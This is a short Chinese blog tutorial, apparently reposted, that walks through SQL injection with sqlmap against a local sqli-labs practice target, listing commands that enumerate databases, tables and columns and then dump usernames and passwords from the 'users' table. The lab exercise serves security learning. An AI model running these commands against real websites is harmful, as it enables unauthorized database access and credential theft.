热门标签
热门文章
- 1人工智能导论(7)——人工神经网络(Machine Learning)_神经网络人工智能实验导论
- 2Qwen1.5-14B-Chat使用与多方式部署(Linux和GPU环境)
- 3Flink框架(一)---概念、运行模式、运行架构
- 4逻辑斯蒂回归分类算法_逻辑斯特分类
- 5深度强化学习的基本概念及基本算法_深度强化学习算法
- 6github加速神器!解决github巨慢的问题,并且能够加速下载!另外推荐GitKraken -- 超好用的 Git 可视化工具_github csdn 加速
- 7JMeter--后置处理器--JSON提取器(JSON Extractor)
- 8关于内部用户通过easy-ip访问外网_action source-nat easy-ip
- 9Multi-Concept Customization of Text-to-Image Diffusion——【代码复现】_on_train_epoch_end() missing 1 required positional
- 10已解决(pip安装pyqt5报错) error: Microsoft Visual C++ 14.0 or greater is required. Get it with “Microsoft
当前位置: article > 正文
sqlmap实战注入步骤——超详细_sqlmap注入实战
作者:盐析白兔 | 2024-04-19 19:27:16
赞
踩
sqlmap注入实战
sqlmap实战注入步骤
测试环境:
系统—>winxp
目标—>sqli—labs
IP—>192.168.1.106
输入?id=1,内容出现变化,存在sql注入
打开sqlmap,输入sqlmap.py -u http://192.168.1.106/sqli-labs-master/Less-2/index.php?id=1 --dbs查看所有数据库
找到很多数据库,查找security数据库中的数据表,sqlmap.py -u http://192.168.1.106/sqli-labs-master/Less-2/index.php?id=1 -D security -tables
看到熟悉的users表了,我们进一步查看表中有哪些列,sqlmap.py -u http://192.168.1.106/sqli-labs-master/Less-2/index.php?id=1 -D security -T users --columns
表中有我们想要的数据,进一步查看数据,sqlmap.py -u http://192.168.1.106/sqli-labs-master/Less-2/index.php?id=1 -D security -T users -C id,password,username --dump
NICE!
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/453311
推荐阅读
相关标签
